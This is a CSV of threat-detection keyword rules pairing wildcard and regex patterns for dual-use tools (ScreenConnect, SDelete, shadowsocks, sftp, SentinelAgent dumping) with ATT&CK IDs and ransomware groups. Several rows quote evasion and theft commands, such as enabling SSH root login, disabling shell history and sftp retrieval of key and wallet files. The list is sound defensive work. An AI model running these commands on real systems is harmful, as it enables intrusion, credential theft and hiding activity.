"*ScreenConnect_*_Release.tar.gz*",".{0,1000}ScreenConnect_.{0,1000}_Release\.tar\.gz.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect_*_Release.zip*",".{0,1000}ScreenConnect_.{0,1000}_Release\.zip.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnectClientNetworkDeployer.exe*",".{0,1000}ScreenConnectClientNetworkDeployer\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*server*-relay.screenconnect.com*",".{0,1000}server.{0,1000}\-relay\.screenconnect\.com.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*-web.screenconnect.com*",".{0,1000}\-web\.screenconnect\.com.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/sdelete.exe*",".{0,1000}\/sdelete\.exe.{0,1000}","greyware_tool_keyword","sdelete","SDelete is an application that securely deletes data in a way that makes it unrecoverable.- abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*/SDelete.zip*",".{0,1000}\/SDelete\.zip.{0,1000}","greyware_tool_keyword","sdelete","SDelete is an application that securely deletes data in a way that makes it unrecoverable.- abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*/sdelete64.exe*",".{0,1000}\/sdelete64\.exe.{0,1000}","greyware_tool_keyword","sdelete","SDelete is an application that securely deletes data in a way that makes it unrecoverable.- abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*/sdelete64a.exe*",".{0,1000}\/sdelete64a\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\sdelete.exe*",".{0,1000}\\sdelete\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\SDelete.zip*",".{0,1000}\\SDelete\.zip.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\sdelete64.exe*",".{0,1000}\\sdelete64\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\sdelete64a.exe*",".{0,1000}\\sdelete64a\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\Software\Sysinternals\Sdelete*",".{0,1000}\\Software\\Sysinternals\\Sdelete.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*>sdelete.exe<*",".{0,1000}\>sdelete\.exe\<.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*>sysinternals sdelete<*",".{0,1000}\>sysinternals\ssdelete\<.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*",".{0,1000}sed\s\'s\/\#PermitRootLogin\sprohibit\-password\/PermitRootLogin\sYes\'\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","sed","allowing root login for ssh","T1078 - T1078.003 - T1021 - T1021.004","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/send.exploit.in/*",".{0,1000}\/send\.exploit\.in\/.{0,1000}","greyware_tool_keyword","send.exploit.in","file-sharing platform used by ransomware groups","T1567","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/sites/default/files/publications/aa22-321a_joint_csa_stopransomware_hive.pdf","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* https://www.sendspace.com/file/*",".{0,1000}\shttps\:\/\/www\.sendspace\.com\/file\/.{0,1000}","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","Hive","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*https://*.sendspace.com/upload*",".{0,1000}https\:\/\/.{0,1000}\.sendspace\.com\/upload.{0,1000}","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","Hive","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"* DumpS1.ps1*",".{0,1000}\sDumpS1\.ps1.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*/DumpS1.ps1*",".{0,1000}\/DumpS1\.ps1.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*\DumpS1.ps1*",".{0,1000}\\DumpS1\.ps1.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*\temp\__SentinelAgentKernel.dmp*",".{0,1000}\\temp\\__SentinelAgentKernel\.dmp.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*\temp\__SentinelAgentUser.dmp*",".{0,1000}\\temp\\__SentinelAgentUser\.dmp.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*DumpProcessPid -targetPID * -outputFile*",".{0,1000}DumpProcessPid\s\-targetPID\s.{0,1000}\s\-outputFile.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*TakeDump -SentinelHelper * -ProcessId * -User * -Kernel *",".{0,1000}TakeDump\s\-SentinelHelper\s.{0,1000}\s\-ProcessId\s.{0,1000}\s\-User\s.{0,1000}\s\-Kernel\s.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*Trying to dump SentinelAgent to *",".{0,1000}Trying\sto\sdump\sSentinelAgent\sto\s.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A"
"*http://*.serveo.net*",".{0,1000}http\:\/\/.{0,1000}\.serveo\.net.{0,1000}","greyware_tool_keyword","serveo.net","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://serveo.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.serveo.net*",".{0,1000}https\:\/\/.{0,1000}\.serveo\.net.{0,1000}","greyware_tool_keyword","serveo.net","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://serveo.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd /c set /A 1^^0*",".{0,1000}cmd\s\/c\sset\s\/A\s1\^\^0.{0,1000}","greyware_tool_keyword","set","Bitwise XOR Operation in commandline observed in a malware sample","T1059.003 - T1480.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://tria.ge/240617-mn75pa1cnl/behavioral2/analog?proc=87","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*cmd.exe /c set /A 1^^0*",".{0,1000}cmd\.exe\s\/c\sset\s\/A\s1\^\^0.{0,1000}","greyware_tool_keyword","set","Bitwise XOR Operation in commandline observed in a malware sample","T1059.003 - T1480.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://tria.ge/240617-mn75pa1cnl/behavioral2/analog?proc=87","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*cmd.exe*/c set /A 1^^0*",".{0,1000}cmd\.exe.{0,1000}\/c\sset\s\/A\s1\^\^0.{0,1000}","greyware_tool_keyword","set","Bitwise XOR Operation in commandline observed in a malware sample","T1059.003 - T1480.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://tria.ge/240617-mn75pa1cnl/behavioral2/analog?proc=87","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*set +o history*",".{0,1000}set\s\+o\shistory.{0,1000}","greyware_tool_keyword","set","Does not write any of the current session to the history log","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*/SetACL.exe*",".{0,1000}\/SetACL\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*/SetACL64..exe*",".{0,1000}\/SetACL64\.\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\SetACL.exe*",".{0,1000}\\SetACL\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\SetACL64.exe*",".{0,1000}\\SetACL64\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*>SetACL.exe<*",".{0,1000}\>SetACL\.exe\<.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*>SetACL64..exe<*",".{0,1000}\>SetACL64\.\.exe\<.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*setspn.exe -F -Q */*",".{0,1000}setspn\.exe\s\-F\s\-Q\s.{0,1000}\/.{0,1000}","greyware_tool_keyword","setspn","Getting users with SPNs","T1003 - T1558.003","TA0007","N/A","N/A","Discovery","https://github.com/b401/Wiki/blob/main/Security/Windows/AD/enumeration.md?plain=1","1","0","N/A","N/A","7","1","0","0","2023-10-24T20:31:01Z","2022-11-12T17:18:05Z"
"*setspn.exe* -T *-Q cifs/*",".{0,1000}setspn\.exe.{0,1000}\s\-T\s.{0,1000}\-Q\scifs\/.{0,1000}","greyware_tool_keyword","setspn","Getting users with SPNs","T1003 - T1558.003","TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*oofgbpoabipfcfjapgnbbjjaenockbdp*",".{0,1000}oofgbpoabipfcfjapgnbbjjaenockbdp.{0,1000}","greyware_tool_keyword","SetupVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/sftp *@*:* ",".{0,1000}/sftp\s.{0,1000}\@.{0,1000}\:.{0,1000}","greyware_tool_keyword","sftp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*/sftp *get*.wallet*",".{0,1000}sftp.*get.*(\.pem|\.key|\.wallet)\b.{0,1000}","greyware_tool_keyword","sftp","sftp transfers of sensitive files","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*/sftp *put*.tar.gz*",".{0,1000}sftp\s.*put.*(\.tar\.gz|\.zip|\.rar|\.7z)\b.{0,1000}","greyware_tool_keyword","sftp","sftp  archive transfers","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"* install shadowsocks-rust*",".{0,1000}\sinstall\sshadowsocks\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"* privoxy.exe*",".{0,1000}\sprivoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"* shadowsocks-divert*",".{0,1000}\sshadowsocks\-divert.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"* shadowsocks-rust.sslocal-daemon*",".{0,1000}\sshadowsocks\-rust\.sslocal\-daemon.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"* shadowsocks-tproxy-mark*",".{0,1000}\sshadowsocks\-tproxy\-mark.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/etc/capabilities/shadowsocks.json*",".{0,1000}\/etc\/capabilities\/shadowsocks\.json.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/etc/shadowsocks-rust*",".{0,1000}\/etc\/shadowsocks\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/genacl_proxy_gfw_bypass_china_ip.py",".{0,1000}\/genacl_proxy_gfw_bypass_china_ip\.py","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/privoxy.exe*",".{0,1000}\/privoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*/Shadowsocks-*.zip*",".{0,1000}\/Shadowsocks\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*/Shadowsocks.zip*",".{0,1000}\/Shadowsocks\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*/shadowsocks_service.*",".{0,1000}\/shadowsocks_service\..{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/shadowsocks-manager.sock*",".{0,1000}\/shadowsocks\-manager\.sock.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/shadowsocks-rust.default*",".{0,1000}\/shadowsocks\-rust\.default.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/shadowsocks-rust.git*",".{0,1000}\/shadowsocks\-rust\.git.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/shadowsocks-rust.init*",".{0,1000}\/shadowsocks\-rust\.init.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/shadowsocks-rust.service*",".{0,1000}\/shadowsocks\-rust\.service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/shadowsocks-service*",".{0,1000}\/shadowsocks\-service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/shadowsocks-windows.git*",".{0,1000}\/shadowsocks\-windows\.git.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*/usr/local/etc/shadowsocks6.json*",".{0,1000}\/usr\/local\/etc\/shadowsocks6\.json.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*/var/log/shadowsocks*",".{0,1000}\/var\/log\/shadowsocks.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*\genacl_proxy_gfw_bypass_china_ip.py",".{0,1000}\\genacl_proxy_gfw_bypass_china_ip\.py","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*\privoxy.exe*",".{0,1000}\\privoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*\Shadowsocks-*.zip*",".{0,1000}\\Shadowsocks\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*\Shadowsocks.CLI\*",".{0,1000}\\Shadowsocks\.CLI\\.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*\Shadowsocks.csproj*",".{0,1000}\\Shadowsocks\.csproj.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
